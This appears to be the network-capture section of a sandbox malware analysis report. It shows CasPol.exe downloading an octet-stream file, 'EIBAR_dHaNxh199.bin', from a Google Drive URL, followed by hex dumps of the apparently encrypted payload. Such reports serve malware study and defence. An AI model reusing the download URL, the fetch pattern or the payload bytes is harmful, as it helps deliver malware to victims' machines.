                                              Location: https://doc-14-5g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/naj9881u9ko47t95uihbncisipqv3ulq/1638192300000/15863333049961931076/*/1xfUz6Q4yBDyDwxM8ow_8y-LmZtRoRBTm?e=download
                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                              Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                              Content-Security-Policy: script-src 'nonce-OoZlycLzjoD3Wp7d9OeKZw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: SAMEORIGIN
                                              X-XSS-Protection: 1; mode=block
                                              Server: GSE
                                              Set-Cookie: NID=511=GKRw3onGieCY-5ENOHcX2LG1gva5BSHEZZTYd2VzTi2fKec8xrVr2bpQfSGE_DJatY6Bpl781yuyeCwfw38HMS3E9tHeukaWdceECsvdtLiXHg7hOz8XD5VlVe4VDkRG0_gfBfzvKbVS02Bzrhj8v8BTUTs4cLP_d7IJPmcZuh4; expires=Tue, 31-May-2022 13:25:45 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                              Accept-Ranges: none
                                              Vary: Accept-Encoding
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              2021-11-29 13:25:45 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 31 34 2d 35 67 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 6e 61 6a 39
                                              Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-14-5g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/naj9
                                              2021-11-29 13:25:45 UTC2INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.11.2049790216.58.212.161443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                              TimestampkBytes transferredDirectionData
                                              2021-11-29 13:25:45 UTC2OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/naj9881u9ko47t95uihbncisipqv3ulq/1638192300000/15863333049961931076/*/1xfUz6Q4yBDyDwxM8ow_8y-LmZtRoRBTm?e=download HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Cache-Control: no-cache
                                              Host: doc-14-5g-docs.googleusercontent.com
                                              Connection: Keep-Alive
                                              2021-11-29 13:25:46 UTC2INHTTP/1.1 200 OK
                                              X-GUploader-UploadID: ADPycds8v-EVPF4OOXC-g-LaD5j2t4EF70USVD7JHkonlKpzkllW1Ln-8YP_Q-irktUS5FAm6XKgvYFNCS5ex5a4Ohsdwhzj3w
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: false
                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout
                                              Access-Control-Allow-Methods: GET,OPTIONS
                                              Content-Type: application/octet-stream
                                              Content-Disposition: attachment;filename="EIBAR_dHaNxh199.bin";filename*=UTF-8''EIBAR_dHaNxh199.bin
                                              Content-Length: 221760
                                              Date: Mon, 29 Nov 2021 13:25:46 GMT
                                              Expires: Mon, 29 Nov 2021 13:25:46 GMT
                                              Cache-Control: private, max-age=0
                                              X-Goog-Hash: crc32c=pqIYgw==
                                              Server: UploadServer
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                              Connection: close
                                              2021-11-29 13:25:46 UTC6INData Raw: ab 72 8e 84 1a 12 bc 62 9b 73 28 0a d9 40 51 14 4b 0c 8f 9a b1 72 c6 8a c3 bb e3 c9 26 d9 b0 98 27 49 de 07 15 1b 03 f8 ca b6 8b 68 81 a5 50 66 71 99 25 77 bd c3 e9 d1 88 ca 51 8f 54 01 5d 3e 04 da 4f 6f a2 fc 12 c2 d3 c9 8f 94 86 1c a3 ea e9 3f 7b 5a 9c 6e ef 9e 66 60 91 b9 1d 5b de 16 44 96 69 28 bc 87 71 1e 93 a6 99 cc 5d ef 66 a3 75 ee d5 4d d6 00 76 5b a0 21 bf 9e aa 2f af 95 29 4d 0c 77 e6 38 c5 b6 c4 55 01 e0 4e ed d0 68 57 bc 2d 4b 9c e7 15 3f 28 ca 64 cd ae 0e d0 59 8f e6 4c db 62 d3 42 0c 32 82 23 8b 47 d4 59 64 81 61 1a 14 7b b1 59 48 a2 63 5b 5e 37 78 4b c7 0a ad 24 73 c9 94 25 0a ea ef 53 cf e9 0c 37 d9 06 82 b1 78 13 0d 18 71 4e bd fa 1d 3a 14 22 e9 f9 a8 e8 28 26 b6 19 53 94 7f 76 c6 cd 1d 95 89 5d f8 f0 0f 2f b9 86 34 76 23 fb ed 16 b7 b0
                                              Data Ascii: rbs(@QKr&'IhPfq%wQT]>Oo?{Znf`[Di(q]fuMv[!/)Mw8UNhW-K?(dYLbB2#GYda{YHc[^7xK$s%S7xqN:"(&Sv]/4v#
                                              2021-11-29 13:25:46 UTC9INData Raw: 13 15 2a e7 f5 dc 29 02 22 c0 f7 52 01 26 68 eb e5 be ad 15 36 1c 71 65 df 90 24 83 92 9d 3c ee 91 35 99 52 54 c9 b9 bf bb 27 2a 69 24 ed 53 db 6f b8 3e 42 ba 45 86 65 e9 a9 3a aa 7d 89 c4 45 dc da a6 7b 03 85 07 ed a6 83 93 c8 6c 9a c5 2d 86 c8 6f 28 87 20 b2 ca 5b eb 85 88 16 cd 9e 2f ce 23 c9 2a ca ed 93 fb 04 85 7c 6a 84 31 09 45 99 b1 7b 2a 68 e7 d1 f8 74 8f 72 f6 e9 2b e9 10 32 1d f1 86 46 4c 60 5e ca c7 bc 86 20 9a 90 8f 96 71 55 95 d6 33 ba 07 82 61 79 ec a3 05 16 fe ad 21 9c 8f ea 6e bb a6 f1 15 5e 8f d2 92 11 69 35 0e 05 6d fd a8 50 67 e7 0c a1 22 95 52 ad 41 81 00 20 63 71 b8 a9 d8 4c 6e 5e ff f5 e7 b5 4c 34 ee 53 5f bb c8 ff 3d e7 3c 32 7f 79 27 98 fa b0 50 7a 6e f8 c0 50 6d be 69 1c 0e 08 e8 91 75 1e 43 97 b5 05 10 9a b7 43 ca 9e db cd b2 8c
                                              Data Ascii: *)"R&h6qe$<5RT'*i$So>BEe:}E{l-o( [/#*|j1E{*htr+2FL`^ qU3ay!n^i5mPg"RA cqLn^L4S_=<2y'PznPmiuCC
                                              2021-11-29 13:25:46 UTC13INData Raw: 5e d7 5c bb 1f 6b 8e 03 a4 a7 5c fb fd 6d cf 42 ac 93 dd 36 77 fb 3d 6e f5 3a f4 1b c2 1c ac 2f 3b 99 c3 c6 6b b2 e6 0e 7a 1a 78 6f 67 05 df 94 d6 c1 dc eb cb fe 68 e9 2a 66 dd 01 9f 1a 86 c8 cd 04 09 c2 73 34 d3 87 1b d1 a6 66 a9 b4 02 63 73 cf 10 c9 75 34 f2 f5 6a 3d ec 8d e0 d2 a1 48 80 df 67 a1 fc 03 d4 dc e2 94 94 7e f4 5d eb 7d 3d 63 51 9c 69 f9 60 27 4c 93 ae 16 5b d9 0e ba 97 45 2a 97 85 5a fd bb d3 9b cc 5b ed 4e 38 75 ee df 65 a0 02 76 5d 88 ba bf 9e 20 30 a5 19 78 52 b6 78 ce 17 cc 7b ef f2 0a 20 dc cc 84 01 16 54 0d 3b e4 a0 05 4f 49 a1 6c 35 cf 60 b4 1e 83 c4 2e b8 6a 3a 37 62 18 c3 68 ab 03 91 22 df ec 0e 74 59 10 be 54 44 ae f8 5b 5e 3d 50 6d c7 5a e2 0c e8 85 95 2c 15 05 49 a8 ae e9 0d 1f 42 06 82 bb 50 8a 0f 1a 76 6d 27 f1 1d 30 64 59 eb
                                              Data Ascii: ^\k\mB6w=n:/;kzxogh*fs4fcsu4j=Hg~]}=cQi`'L[E*Z[N8uev] 0xRx{ T;OIl5`.j:7bh"tYTD[^=PmZ,IBPvm'0dY
                                              2021-11-29 13:25:46 UTC17INData Raw: d1 09 71 84 dc 2c 7b cd cd 3e 45 4d 07 b4 a4 a1 47 d8 d2 55 37 21 dd 7b e6 00 af 2f 2b e6 a1 7c 48 f4 e8 da 28 c0 08 2a e6 e2 7b 46 49 68 eb e5 bc 85 2a 3c 34 95 6f 01 84 63 72 92 9d 3c 18 b0 12 b1 63 5e e1 8b ac 99 05 cc 69 22 cd 8d db 7e b1 3e 54 bb 47 80 73 2f bf b5 a0 a9 85 ec 72 dc d8 ac 0a 3b c7 9c e7 72 83 82 c0 44 24 c5 2d 80 0a 04 28 95 30 6c c5 7f d8 82 8d 16 d0 8c 0c e6 0e c9 2a d1 31 bb a3 0c ad a1 1e b7 37 66 82 93 b7 59 be 67 c2 f3 a0 3f 8f 78 ef cb 14 be 5c 32 17 25 80 77 64 06 bf ca a8 f7 e9 e6 90 96 92 27 30 70 bd eb 35 a5 3f fe 0b 51 d4 a9 03 34 6c af 30 92 c8 be 6f bb aa 98 fb 13 8d d8 4a 71 1d 1d 39 0f 6b 98 e9 76 4f d5 07 a6 5c 71 52 bc 48 c6 b0 20 63 7d ff 21 da 4c 62 96 d8 fe cf 82 46 22 a4 cb 78 93 f0 f8 52 b9 e2 32 64 7d 08 39 a2
                                              Data Ascii: q,{>EMGU7!{/+|H(*{FIh*<4ocr<c^i"~>TGs/r;rD$-(0l*17fYg?x\2%wd'0p5?Q4l0oJq9kvO\qRH c}!LbF"xR2d}9
                                              2021-11-29 13:25:46 UTC18INData Raw: 03 b6 c2 ea 6f 81 90 fd 92 cd 86 61 75 42 83 9d c8 d2 d8 f0 b5 ad 7e 17 21 96 cf 11 e3 cc 86 d9 c3 74 d8 3c 72 12 c8 92 73 e8 4e 9b 28 45 05 1d 6e d8 23 f0 75 d0 f0 f5 66 3f d5 bd e2 d4 81 61 80 df 69 b0 fb 7d 10 d7 c9 85 bc 5d e3 a3 e0 45 29 53 68 9c 6e e9 b8 fb 5a 90 b9 1d 7e f6 21 44 96 63 3b 81 93 62 19 bb 9e 99 cc 57 32 43 a2 75 ee ab 43 d6 00 72 43 e0 bd bf 9e 2a 34 22 80 27 52 b7 6a a6 9d 8c 6d cd 22 02 ac 85 6e 95 40 29 b1 1a 3b ee 8c 5a 08 4b a7 42 86 98 62 be 30 94 be 2e be 48 03 26 22 0a c3 15 a9 03 9d a8 55 ac 17 56 08 55 bc 5e 51 c4 71 19 20 21 78 4b c3 72 92 24 73 8f 37 37 4a 15 ed 91 ac e9 0a 95 c8 46 aa ca 78 f3 07 32 17 47 bc f7 35 12 4c 21 ef e8 a7 87 fa 26 b6 13 7b 7a 0b 75 c0 e5 13 97 89 5b 97 88 0f 2f b3 ee 5c 74 03 fd c5 6a b5 b0 60
                                              Data Ascii: oauB~!t<rsN(En#uf?ai}]E)ShnZ~!Dc;bW2CuCrC*4"'Rjm"n@);ZKBb0.H&"UVU^Qq !xKr$s77JFx2G5L!&{zu[/\tj`
                                              2021-11-29 13:25:46 UTC19INData Raw: d8 a6 22 03 e1 95 ed ac 8d 93 c8 6c ae cc 2d 86 6a c2 28 95 20 b2 ca 5b f0 b5 8d 16 99 96 2f ce 38 c9 2a db be b2 b2 04 8a 76 1e b7 2b 09 44 92 b7 53 60 68 87 d2 97 3f 81 72 fc ef 52 8f 5c 32 12 fb 80 66 76 2e 5e cb a8 f1 86 20 ed 9f 98 f9 31 55 95 dc be ac 35 ed 21 79 ec a9 19 3e b2 ae 21 9a e0 ba f4 b2 ac f7 33 13 8d d2 3c 77 38 35 01 0f 6b 92 e0 50 67 ec 07 a6 56 af e5 a4 40 ee 5d 20 63 7b 55 ee da 4c 67 48 d7 db fd b5 46 23 ae d8 5f bb 1c f1 52 b3 32 32 75 75 c2 fe a2 b0 5f 70 d9 ef 0c dd 46 bf 69 1d 03 0b 01 80 06 47 4d 97 bf 16 eb 84 a4 46 d3 8d dc db 24 b3 28 3d 2f 42 53 df 9e 4e 43 93 b3 9a b9 5b 05 e6 d4 1a 1c 13 1d 3d b1 ab 0c 81 c5 75 e8 cf c7 db dd ad 4f fe fe 99 94 15 55 95 6f 55 53 1d 2c a8 b2 63 1a 58 4f d3 9f 43 47 3e c0 04 40 fc dc a1 7a
                                              Data Ascii: "l-j( [/8*v+DS`h?rR\2fv.^ 1U5!y>!3<w85kPgV@] c{ULgHF#_R22uu_pFiGMF$(=/BSNC[=uOUoUS,cXOCG>@z
                                              2021-11-29 13:25:46 UTC20INData Raw: 69 28 b6 91 42 c8 88 ad 99 cb 46 11 67 8f 7d c6 fb 4f d6 06 5c 47 ab 21 b8 83 d4 2e 83 9e 25 44 b5 16 09 8c cc 71 cf f3 0b ac 84 da 7a 01 12 cd 1a 30 ee 8f 6c b3 48 8b 46 85 ca 58 c1 c9 04 39 28 94 42 a1 24 52 10 eb d4 ab 03 9b 2d 44 ec 1f 68 62 51 84 d4 42 86 63 5b 4f 33 61 b5 c6 76 ed 32 7f 9f 86 22 0a 1e c1 ec 50 e8 20 30 d0 0e 18 ba 64 e0 09 1a 61 41 a6 0f 1c 16 49 0a 8a e2 b3 ec 28 37 b2 05 ad ab 25 64 c1 a2 50 95 89 57 fa 9f ff 2f b9 cc 18 30 1e e8 e9 16 a4 b4 7d 92 ab 14 07 66 c4 ab 7d a4 a2 2d 12 ed c5 36 2b bc 2c 73 d7 a6 18 5e 64 f0 de fc 90 15 f5 9a 06 fe 07 93 a8 62 22 fb ff 70 3a 41 a4 ab 03 70 63 28 3a eb e8 a7 20 de d7 bc 2e 02 3e c2 11 23 6b 3c a4 5c a1 36 4a ff 7c 76 cd fd 3e 57 04 f9 46 c1 47 a4 30 51 09 17 39 aa 73 4a ef e2 e3 87 ad d8
                                              Data Ascii: i(BFg}O\G!.%Dqz0lHFX9(B$R-DhbQBc[O3av2"P 0daAI(7%dPW/0}f}-6+,s^db"p:Apc(: .>#k<\6J|v>WFG0Q9sJ
                                              2021-11-29 13:25:46 UTC22INData Raw: 9c 8f 47 6e bb a6 98 c3 13 8d d8 9e 67 34 35 06 10 60 6c fb 7c 6c ea 11 d8 5e af 52 a9 e2 f1 5f 2c 63 73 8f eb 24 4d 44 43 d0 cc 99 ac 46 22 aa 7a 40 b6 c4 f8 5a a4 c2 33 59 77 38 fb a2 b8 4b 8e d8 c3 05 db 6e 59 6b 1d 05 23 18 8b 06 41 2c ef bf 16 1e 87 b8 4a dc 85 c3 cb c0 b2 04 37 28 59 2d c6 90 44 47 31 a2 8b b5 5b 11 f5 2a 1b 3f 00 1b 15 48 a9 0c 86 ed 91 ea cf ea be a5 ad 41 f4 f4 83 a1 1f 5d 83 9d 54 7f 1f 21 a4 b2 6a 05 4a b1 d2 f6 4b 6c 3b f6 77 be 03 70 81 7a 33 56 17 96 79 25 c1 bb 32 2f a8 3e db c3 d2 dd 5a c3 1f a3 be f4 d2 b7 eb 89 56 e3 a8 ed 65 31 e8 d2 72 06 3f 2e f8 21 75 d3 08 c0 04 2c cc 4f 87 86 70 d1 b3 15 f5 21 04 c8 b9 77 18 3c 94 dc ea 5e a2 12 a9 49 2f 8a 08 90 a8 44 5f 09 f2 29 44 7f 20 51 ca 48 bc 08 00 8f 13 a0 b2 59 14 f9 53
                                              Data Ascii: Gng45`l|l^R_,cs$MDCF"z@Z3Yw8KnYk#A,J7(Y-DG1[*?HA]T!jJKl;wpz3Vy%2/>ZVe1r?.!u,Op!w<^I/D_)D QHYS
                                              2021-11-29 13:25:46 UTC23INData Raw: 65 96 91 1e 98 0f c5 f7 ae f8 08 2c 27 07 ae af 7e 9c 0a 1b 70 4f c2 d4 1d 3a 48 29 73 ef 88 c6 28 26 bc 0f ad ab 30 01 c6 cd 3d 89 9a 59 f8 e1 0b 37 47 c7 18 65 7d d9 ed 16 b1 98 95 6c aa 32 6b 13 d7 af 77 bf bf 26 e8 ec f8 3b 1a 71 2d 5f d2 bd 7f 68 60 f0 cb 76 3a fc 2e bb 0f f3 3e 89 bb 77 26 f6 05 67 e8 45 9f 82 09 70 63 28 3a eb ec a7 20 de d0 bc 07 21 56 39 ee cd 67 3c 8c 51 85 3c dc 5b 4a f0 ca d3 28 a9 05 ce 75 d2 54 27 32 40 0d 22 c7 ab 4e 60 1d e5 db e8 58 54 64 4b a0 66 8e 51 8f 83 88 cd 2c cb 11 d0 18 9f 55 36 f3 d6 0f 1e 6d dc 2c 60 3b 89 16 72 4b 87 9e 8c 99 43 a6 fc 8b 37 34 f9 6d 58 23 af 29 40 37 92 64 3c 0f e7 ff 04 79 bf 3c dd dd 72 24 71 68 ed c2 67 58 68 33 1c 77 44 1f fc 2f b4 92 99 2e f5 a9 49 bc 54 5e e5 0f 08 ad 1c f8 41 69 c7 53
                                              Data Ascii: e,'~pO:H)s(&0=Y7Ge}l2kw&;q-_h`v:.>w&gEpc(: !V9g<Q<[J(uT'2@"N`XTdKfQ,U6m,`;rKC74mX#)@7d<y<r$qhgXh3wD/.IT^AiS
                                              2021-11-29 13:25:46 UTC24INData Raw: 2d d7 90 44 47 bb b7 99 b9 5d 31 c8 d4 1a 19 93 15 3d ab af d1 89 c6 75 e8 cd f3 a6 ee b4 3f f6 fe 99 a9 37 5e 96 63 53 7b 39 36 a8 b8 e2 12 58 4f d7 07 a2 45 3e ce 06 5f 84 bc b2 04 3b 56 0c a2 55 29 09 bb 34 07 a6 3e db d8 50 fd a5 c3 1b 74 1c c2 d2 b7 e3 f9 1a d0 b1 99 67 ec 5b d6 5a 0b 19 06 c9 09 51 d9 04 c8 ac db cc 4f 89 48 db f3 b3 11 f7 3e f3 80 a0 09 11 31 44 a4 c2 50 a0 3a bb 61 0b 80 20 9a 29 4c 55 00 78 43 0d c5 33 54 de 5c d6 3f 76 f0 1a a0 b8 54 2d f3 42 c2 4d 9b be f5 47 7f 7b 33 cc ea 33 3a 6c c0 0d a8 32 34 47 f1 f3 1b b3 f9 03 69 1a 02 6d 67 05 55 af c7 d2 d2 6b d2 fa 7e 13 f6 1f dc 16 8c 36 82 d9 c9 1d 7e 35 73 18 db c3 15 e8 4e 91 7e 4f 05 1d 6c a0 19 cc 5d 1a 9d ff 61 17 f5 ab 1c d3 f6 4b 9f cd 91 a0 ea ec c3 88 cb af 30 79 e3 a3 14
                                              Data Ascii: -DG]1=u?7^cS{96XOE>_;VU)4>Ptg[ZQOH>1DP:a )LUxC3T\?vT-BMG{33:l24GimgUk~6~5sN~Ol]aK0y
                                              2021-11-29 13:25:46 UTC26INData Raw: 75 39 ea ea 7d db 67 76 a9 38 69 76 23 31 39 e5 52 3e da c6 8c 2b 2b 5e 22 f9 22 62 07 78 41 a2 25 12 5b 45 ef c3 c4 25 57 15 f9 69 f1 b9 22 1e 43 21 2c 38 aa 68 73 33 8f f5 80 a7 a1 88 5a a8 85 91 42 86 ac f5 2d fd ca 06 d6 0d ad 40 3d 58 c3 0e 1e 48 cf 2a 6e 3c d2 0d 72 5c 1c a1 a6 67 46 f4 d6 89 26 3b fd 41 27 00 a5 3a 5c 3f 8a 6f 59 2a f6 e4 1f fe f6 2b c0 ff 58 7f 7a 40 fe ee 62 8f 28 25 03 7d 7c 1a 82 1d af 8d b9 c8 c7 93 23 b1 47 5f e1 8b bd aa 26 e5 6d 4d d3 52 db 65 b4 09 67 a9 5c 86 0d f2 a0 aa 54 76 a5 ce 54 d7 c2 70 31 08 d8 bc fe b7 83 82 d3 72 64 c4 01 8c 74 c9 32 43 29 b9 d5 53 e3 ae 8d 07 c1 80 13 30 37 e5 26 dd fe b4 dd 2c 87 76 18 a8 0c 1a 5f 93 a6 48 7f 4b 19 da bb 35 9e 79 e6 39 2f 8d 43 16 0e e0 80 77 77 31 6b 34 a9 dd 81 31 89 9d 87
                                              Data Ascii: u9}gv8iv#19R>++^""bxA%[E%Wi"C!,8hs3ZB-@=XH*n<r\gF&;A':\?oY*+Xz@b(%}|#G_&mMReg\TvTp1rdt2C)S07&,v_HK5y9/Cww1k41
                                              2021-11-29 13:25:46 UTC27INData Raw: 15 2e dd 20 75 d3 17 d3 3d dc d6 99 9e 9a 65 e0 a4 cb e2 f7 04 98 b9 77 18 22 54 a2 fb 51 b2 2a ab 58 3e a8 31 91 a9 4e 44 0f 6d 8f 4a d4 3c 56 cd 4c 85 1e 6e 8e 18 b3 b6 41 0a e6 50 cc 9d 65 89 fa 45 64 f4 13 de eb 37 ed 13 d3 02 b2 e6 38 68 c0 fb 6a 93 eb 02 6d 38 55 7e 68 19 ab 98 c8 d0 c9 e4 f2 e8 7f 17 21 59 d3 07 83 04 97 d4 1f cd 02 33 70 09 de 84 0c e8 4e 91 45 4e 14 12 70 19 03 c2 4c 15 e5 2f 77 c1 72 96 e2 d2 a8 5a 84 dd 7e ae ed 16 d4 c6 cc a7 85 78 e3 a9 e9 40 33 14 46 9d 6e e5 a7 0a 61 91 b9 15 7b d0 96 44 96 29 b7 bc 87 71 1d 82 aa f6 d1 5c ef 6c cc 6b ef d5 47 fe 52 76 5b a6 32 ab 8f 3e 3e bf 9d 0f 02 b6 79 e0 9f de 7c 89 ce 00 ac 83 cc 84 00 1e 8f 56 18 ee 88 72 4d 49 a7 b4 91 96 48 2f 36 fb cc 99 a9 94 2c 1c 62 12 ea 5e b8 12 89 1b 57 eb
                                              Data Ascii: . u=ew"TQ*X>1NDmJ<VLnAPeEd78hjm8U~h!Y3pNENpL/wrZ~x@3Fna{D)q\lkGRv[2>>y|VrMIH/6,b^W
                                              2021-11-29 13:25:46 UTC28INData Raw: d8 d2 16 26 3a ba 61 27 00 a5 3a 40 08 b2 7d 42 20 e5 90 98 f7 08 20 ff f4 72 7d 70 68 e1 fe 66 ea a3 34 1c 7d 7c 07 93 0a a0 ba 1c 34 c6 b9 21 14 53 5e e1 80 ab af 39 dc ca 22 c7 59 c3 e3 86 16 42 bb 6f b5 1d e9 b5 a2 26 48 89 c4 44 f4 6b a6 22 09 ef c6 ed ac 89 84 1e e1 b1 c5 2d 87 76 c5 39 93 2e 9a d3 59 f0 b3 95 9b dd 9f 2f cf 25 c2 3b d0 f9 aa b5 a6 94 7d 09 a1 bd 36 44 93 b6 f1 71 63 f4 d7 86 33 9b 66 e4 62 13 86 5c 33 0e f6 91 6b 7a 39 c2 db a5 e6 90 bc 81 9b 8f d1 98 55 95 d6 13 b4 38 fb be 55 f3 b8 0f 28 28 87 30 9a e0 b0 be a9 ac f7 26 3b 99 d2 94 74 10 01 0f 0f 61 e6 e8 50 67 f6 14 a1 47 a8 43 aa ce 59 4b fa 75 e7 e3 c2 db 4c 62 5b df ca ef a1 6e 38 ad d8 59 ac 45 ff 52 b3 3d 21 79 64 2c e1 b3 b5 78 61 d9 ef 1c 7f 57 b2 7a 16 12 00 e4 9d 11 ca
                                              Data Ascii: &:a':@}B r}phf4}|4!S^9"YBo&HDk"-v9.Y/%;}6Dqc3fb\3kz9U8U((0&;taPgGCYKuLb[n8YER=!yd,xaWz
                                              2021-11-29 13:25:46 UTC29INData Raw: 09 eb da fa 77 37 22 ca de 16 cc d8 86 d9 c9 68 37 3d 72 12 c2 8e 00 64 65 9b 56 4a 16 3e 75 d7 9d e6 5d 10 f3 e6 44 06 fa a2 fa c3 8a 5f 9e f7 7e a0 fc 18 d3 d2 df 9e b0 6f fc bb c2 40 3e 7b 50 8d 4c fe ba 49 47 90 b9 17 4a fc 07 67 f9 41 29 bc 8d 60 3c 84 c9 b0 cd 5d e5 77 81 6c 81 ff 4c d6 0a 67 79 cf 0a be 9e 20 3e ab 83 36 56 38 ce 89 a0 cd 7b ef fe 25 b3 c3 41 af 00 3e ce 1e 1a ff ad 6d 65 58 86 52 b1 8f 48 af 37 fb cc 5d 9b 43 a1 3d 71 34 fa 6b ba 22 f4 28 45 ec 04 6d 56 44 9b 7c 55 87 63 51 76 60 7a 4b c1 72 c6 26 73 83 fa 5e 0a 0f cf e4 86 ee 1d 31 c8 2e ed 8b 79 f3 07 c4 7c 54 9a dd 1a 2b 6a 4e be f9 a0 e2 f4 21 bc c7 4a ad 03 ab d3 ca 37 4b 98 78 d0 c7 0f 2f b3 d5 1d 5e 3b fb ed 1c 6b b0 6d 46 ac 12 45 02 d7 af 7f b5 a6 35 58 ec e9 3f 22 8f 2c
                                              Data Ascii: w7"h7=rdeVJ>u]D_~o@>{PLIGJgA)`<]wlLgy >6V8{%A>meXRH7]C=q4k"(EmVD|UcQv`zKr&s^1.y|T+jN!J7Kx/^;kmFE5X?",
